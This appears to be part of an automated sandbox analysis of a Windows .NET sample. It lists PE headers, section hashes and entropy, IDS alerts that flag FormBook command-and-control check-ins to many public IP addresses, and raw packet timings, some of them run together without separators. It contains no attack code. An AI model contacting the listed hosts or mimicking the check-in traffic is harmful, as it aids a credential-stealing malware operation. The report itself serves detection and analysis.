                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac4f0 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x13a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xabe00 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xaa548 | 0xaa600 | c666d057df4cdd32cc51e42aa1a50252 | False | 0.9355698023661042 | data | 7.868773952918643 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xae000 | 0x13a0 | 0x1400 | 6c38bc57cd743c1b57c1ed87936e785d | False | 0.7779296875 | data | 7.025501603865899 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb0000 | 0xc | 0x200 | 547b0ed5bc2bfbfca917077fed206b78 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xae0c8 | 0xf91 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8936010037641154
RT_GROUP_ICON | 0xaf06c | 0x14 | data | | | 1.05
RT_VERSION | 0xaf090 | 0x30c | data | | | 0.42948717948717946
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-11T15:09:27.764958+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49958 | 154.23.184.95 | 80 | TCP
2024-10-11T15:09:27.764958+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49958 | 154.23.184.95 | 80 | TCP
2024-10-11T15:09:43.699694+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49986 | 172.67.218.106 | 80 | TCP
2024-10-11T15:09:46.253121+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49987 | 172.67.218.106 | 80 | TCP
2024-10-11T15:09:48.782424+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49988 | 172.67.218.106 | 80 | TCP
2024-10-11T15:09:51.371879+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49989 | 172.67.218.106 | 80 | TCP
2024-10-11T15:09:51.371879+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49989 | 172.67.218.106 | 80 | TCP
2024-10-11T15:09:57.535649+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49990 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:00.055484+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49991 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:02.659949+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49992 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:05.167434+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49993 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:05.167434+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49993 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:11.586690+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49994 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:13.225240+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49995 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:16.679158+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49996 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:18.378066+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49997 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:18.378066+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49997 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:24.685844+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49998 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:27.259005+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49999 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:29.825861+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50000 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:32.372952+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50001 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:32.372952+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50001 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:39.116174+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50002 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:41.662948+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50003 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:44.209821+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50004 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:45.986721+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50005 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:45.986721+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50005 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:51.990952+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50006 | 104.21.42.219 | 80 | TCP
2024-10-11T15:10:54.548858+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50007 | 104.21.42.219 | 80 | TCP
2024-10-11T15:10:57.285260+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50008 | 104.21.42.219 | 80 | TCP
2024-10-11T15:10:59.855693+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50009 | 104.21.42.219 | 80 | TCP
2024-10-11T15:10:59.855693+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50009 | 104.21.42.219 | 80 | TCP
2024-10-11T15:11:05.517765+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50010 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:08.065487+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50011 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:10.655682+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50012 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:13.124797+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50013 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:13.124797+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50013 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:19.131316+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50014 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:21.725813+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50015 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:24.406502+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50016 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:27.797965+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50017 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:27.797965+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50017 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:34.182415+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50018 | 199.59.243.227 | 80 | TCP
2024-10-11T15:11:36.729656+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50019 | 199.59.243.227 | 80 | TCP
2024-10-11T15:11:39.296563+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50020 | 199.59.243.227 | 80 | TCP
2024-10-11T15:11:41.819632+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50021 | 199.59.243.227 | 80 | TCP
2024-10-11T15:11:41.819632+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50021 | 199.59.243.227 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 11, 2024 15:09:26.167447090 CEST | 49958 | 80 | 192.168.2.5 | 154.23.184.95
Oct 11, 2024 15:09:26.172668934 CEST | 80 | 49958 | 154.23.184.95 | 192.168.2.5
Oct 11, 2024 15:09:26.172790051 CEST | 49958 | 80 | 192.168.2.5 | 154.23.184.95
Oct 11, 2024 15:09:26.181927919 CEST | 49958 | 80 | 192.168.2.5 | 154.23.184.95
Oct 11, 2024 15:09:26.186898947 CEST | 80 | 49958 | 154.23.184.95 | 192.168.2.5
Oct 11, 2024 15:09:27.764803886 CEST | 80 | 49958 | 154.23.184.95 | 192.168.2.5
Oct 11, 2024 15:09:27.764822006 CEST | 80 | 49958 | 154.23.184.95 | 192.168.2.5
Oct 11, 2024 15:09:27.764957905 CEST | 49958 | 80 | 192.168.2.5 | 154.23.184.95
Oct 11, 2024 15:09:27.772936106 CEST | 49958 | 80 | 192.168.2.5 | 154.23.184.95
Oct 11, 2024 15:09:27.778554916 CEST | 80 | 49958 | 154.23.184.95 | 192.168.2.5
Oct 11, 2024 15:09:42.873004913 CEST | 49986 | 80 | 192.168.2.5 | 172.67.218.106
Oct 11, 2024 15:09:42.877890110 CEST | 80 | 49986 | 172.67.218.106 | 192.168.2.5
Oct 11, 2024 15:09:42.877970934 CEST | 49986 | 80 | 192.168.2.5 | 172.67.218.106
Oct 11, 2024 15:09:42.887197971 CEST | 49986 | 80 | 192.168.2.5 | 172.67.218.106
Oct 11, 2024 15:09:42.892302036 CEST | 80 | 49986 | 172.67.218.106 | 192.168.2.5
Oct 11, 2024 15:09:43.699394941 CEST | 80 | 49986 | 172.67.218.106 | 192.168.2.5
Oct 11, 2024 15:09:43.699641943 CEST | 80 | 49986 | 172.67.218.106 | 192.168.2.5
Oct 11, 2024 15:09:43.699693918 CEST | 49986 | 80 | 192.168.2.5 | 172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:43.699879885 CEST8049986172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:43.699932098 CEST4998680192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:44.397639036 CEST4998680192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:45.415618896 CEST4998780192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:45.423908949 CEST8049987172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:45.424015045 CEST4998780192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:45.433125973 CEST4998780192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:45.441298008 CEST8049987172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:46.252962112 CEST8049987172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:46.253051996 CEST8049987172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:46.253120899 CEST4998780192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:46.256342888 CEST8049987172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:46.256395102 CEST4998780192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:46.944399118 CEST4998780192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:47.962367058 CEST4998880192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:47.967382908 CEST8049988172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:47.967585087 CEST4998880192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:47.976398945 CEST4998880192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:47.981275082 CEST8049988172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:47.981333971 CEST8049988172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782198906 CEST8049988172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782293081 CEST8049988172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782423973 CEST4998880192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782619953 CEST8049988172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782860041 CEST8049988172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782933950 CEST4998880192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:49.491193056 CEST4998880192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:50.550116062 CEST4998980192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:50.556802034 CEST8049989172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:50.556891918 CEST4998980192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:50.579787016 CEST4998980192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:50.584764004 CEST8049989172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.371690989 CEST8049989172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.371757984 CEST8049989172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.371879101 CEST4998980192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.373159885 CEST8049989172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.373215914 CEST4998980192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.375962019 CEST4998980192.168.2.5172.67.218.106
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.380793095 CEST8049989172.67.218.106192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.866596937 CEST4999080192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.871702909 CEST804999074.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.871786118 CEST4999080192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.893328905 CEST4999080192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.898736954 CEST804999074.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:57.535053015 CEST804999074.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:57.535561085 CEST804999074.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:57.535649061 CEST4999080192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:58.397726059 CEST4999080192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:59.415587902 CEST4999180192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:59.420818090 CEST804999174.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:59.421082973 CEST4999180192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:59.436171055 CEST4999180192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:59.441365004 CEST804999174.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:00.054867029 CEST804999174.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:00.055413008 CEST804999174.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:00.055484056 CEST4999180192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:00.944291115 CEST4999180192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:01.966196060 CEST4999280192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:01.972213984 CEST804999274.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:01.972414970 CEST4999280192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:01.984869003 CEST4999280192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:01.990119934 CEST804999274.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:01.990159035 CEST804999274.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:02.659430027 CEST804999274.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:02.659764051 CEST804999274.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:02.659949064 CEST4999280192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:03.491365910 CEST4999280192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:04.509598970 CEST4999380192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:04.514941931 CEST804999374.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:04.515301943 CEST4999380192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:04.522831917 CEST4999380192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:04.527976990 CEST804999374.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.166424036 CEST804999374.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.167201996 CEST804999374.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.167237043 CEST804999374.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.167433977 CEST4999380192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.167433977 CEST4999380192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.173593044 CEST4999380192.168.2.574.48.31.123
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.178930044 CEST804999374.48.31.123192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.202008009 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.208599091 CEST80499943.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.208709955 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.219881058 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.228260040 CEST80499943.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:11.586524010 CEST80499943.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:11.586689949 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:11.725552082 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:11.730637074 CEST80499943.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:12.743801117 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:12.749183893 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:12.751353025 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:12.760232925 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:12.765317917 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:13.224961042 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:13.225239992 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.283760071 CEST8050008104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.283896923 CEST8050008104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.285259962 CEST5000880192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.944284916 CEST5000880192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.963094950 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.969918013 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.970199108 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.976104021 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.982182026 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855504990 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855571985 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855693102 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855999947 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.856070042 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.862699032 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.868853092 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.889868975 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.894965887 CEST8050010162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.895493031 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.907160044 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.912312984 CEST8050010162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:05.517242908 CEST8050010162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:05.517621994 CEST8050010162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:05.517765045 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:06.412935972 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.431361914 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.436774969 CEST8050011162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.436901093 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.447925091 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.453250885 CEST8050011162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.064826965 CEST8050011162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.065443039 CEST8050011162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.065486908 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.960056067 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.977893114 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.982978106 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.983083010 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.996279001 CEST5001280192.168.2.5162.0.225.218
